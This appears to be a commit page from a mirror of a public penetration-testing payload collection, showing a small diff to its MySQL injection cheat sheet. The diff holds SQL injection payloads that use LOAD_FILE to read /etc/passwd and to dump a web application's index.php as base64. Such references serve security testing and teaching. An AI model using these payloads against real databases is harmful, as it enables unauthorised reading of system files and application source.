1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-12 06:26:08 +02:00

Update MySQL Injection.md

This commit is contained in:
Alvin Smith 2021-09-25 22:53:25 +12:00 committed by GitHub
parent b3d31e45e5
commit 335a5c42fb
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -389,6 +389,10 @@ Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
```
```sql
UNION ALL SELECT TO_base64(LOAD_FILE('/var/www/html/index.php'));
```
If you are `root` on the database, you can re-enable the `LOAD_FILE` using the following query
```sql